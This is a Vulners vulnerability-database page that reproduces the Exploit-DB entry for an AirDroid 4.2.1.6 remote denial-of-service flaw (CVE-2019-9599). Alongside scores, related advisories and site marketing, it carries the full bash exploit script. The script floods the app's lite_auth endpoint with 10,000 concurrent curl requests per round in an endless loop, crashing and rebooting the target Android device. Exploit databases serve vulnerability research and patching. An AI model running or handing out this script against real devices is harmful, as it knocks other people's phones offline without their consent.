Lucene search
+L

AirDroid 4.2.1.6 - Denial of Service

🗓️ 11 Feb 2019 00:00:00Reported by s4vitarType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 60 Views

AirDroid 4.2.1.6 - Remote Denial of Service (DoS) and Forced Reboot Marcelo Vázquez (s4vitar) and Victor Lasa (vowkin) discovered a Denial of Service vulnerability on AirDroid 4.2.1.6 which allows an attacker to crash the system remotely and force a reboot. The exploit triggers the vulnerability by sending a high number of requests, causing the system to crash and reboot.

Related
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for CVE-2019-9599
9 Feb 201902:18
githubexploit
cve
CVE
CVE-2019-9599
6 Mar 201918:00
cve
cvelist
Cvelist
CVE-2019-9599
6 Mar 201918:00
cvelist
nvd
NVD
CVE-2019-9599
6 Mar 201918:29
nvd
osv
OSV
CVE-2019-9599
6 Mar 201918:29
osv
prion
Prion
Code injection
6 Mar 201918:29
prion
redhatcve
RedhatCVE
CVE-2019-9599
22 May 202508:11
redhatcve
#!/bin/bash

# *********************************************************************
# *             Author: Marcelo Vázquez (aka s4vitar)                 *
# *  AirDroid Denial of Service (DoS) & System Crash + Forced Reboot  *
# *********************************************************************

# Exploit Title: AirDroid Remote Denial of Service (DoS) & System Crash + Forced Reboot
# Date: 2019-02-13
# Exploit Author: Marcelo Vázquez (aka s4vitar)
# Collaborators: Victor Lasa (aka vowkin)
# Vendor Homepage: https://web.airdroid.com/
# Software Link: https://play.google.com/store/apps/details?id=com.sand.airdroid&hl=en
# Version: <= AirDroid 4.2.1.6
# Tested on: Android

url=$1 # Example: http://192.168.1.46:8888
requests=0

trap ctrl_c INT

# If Ctrl+C key is pressed then the threads are killed
function ctrl_c() {
        echo -e "\n\n[*]Exiting...\n" && tput cnorm
        pkill curl > /dev/null 2>&1
        exit
}

# Detect number of arguments being passed to the program
if [ "$(echo $#)" == "1" ]; then
	# Infinite Loop
	tput cnorm && while true; do
		# We send 10000 requests in thread
		for i in $(seq 1 10000); do
			curl --silent "$url/sdctl/comm/lite_auth/" &
			let requests+=1
		done && wait # Here we wait for the threads to finish
	echo "Requests Sent: $requests"
	done
else
	echo -e "\nUsage: ./AirDroid_request.sh http://ip:port\n"
fi

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Mar 2019 00:00Current
7.3High risk
Vulners AI Score7.3
CVSS 37.5
CVSS 27.8
EPSS0.13309
60